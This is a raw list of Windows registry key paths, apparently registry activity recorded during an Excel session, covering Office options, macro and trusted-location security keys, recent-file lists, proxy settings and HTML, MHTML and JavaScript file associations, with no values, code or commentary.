HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OptionFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FirstRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\WorkbookLinkWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\DataConnectionWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 27
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 26
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 25
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 24
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 23
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 22
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location0\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location0\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location0\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location1\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location2\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location2\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location3\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location4\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5\Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations\Location5\AllowSubFolders
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Migration\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EdgeRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryConfirmationEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetrySent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!zm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C23E02
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C23E02\1C23E02
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0\MSForms
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0\MSComctlLib
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\DisableUIAProxies
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\DisableIntellisenseUIAProxies
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls\EnableWindowControl
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls\EnableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls\EnableDynamicDPI
HKEY_CURRENT_USER\Software\Microsoft\VBA\VBEUI
HKEY_CURRENT_USER\Software\Microsoft\VBA\VBEUI\DisableDynamicDpi
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle\ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C24016
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C24016\1C24016
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E\@%SystemRoot%\system32\packager.dll,-2000
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\42\Shell
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\42\Shell\KnownFolderDerivedFolderType
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride\{C845E028-E091-442E-8202-21F596C559A0}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{BD472F60-27FA-11CF-B8B4-444553540000} {000214E4-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids\JSFile
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\57\52C64B7E\@C:\Windows\System32\wshext.dll,-4511
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RibbonCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\KnownIDs
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\HTML\Old Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\shell\Print\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\ShellEx
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\ChromeHTML\ShellEx\IconHandler\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\KnownIDs
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Edit\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Print
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\MHTML\Old Default Editor\shell\Print\command
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\Print\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\ShellEx\IconHandler\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile\DefaultIcon\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\CacheReady
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\LastRequest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\LastUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ServicesManagerCache\ServicesCatalog\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\0"o
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Type
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
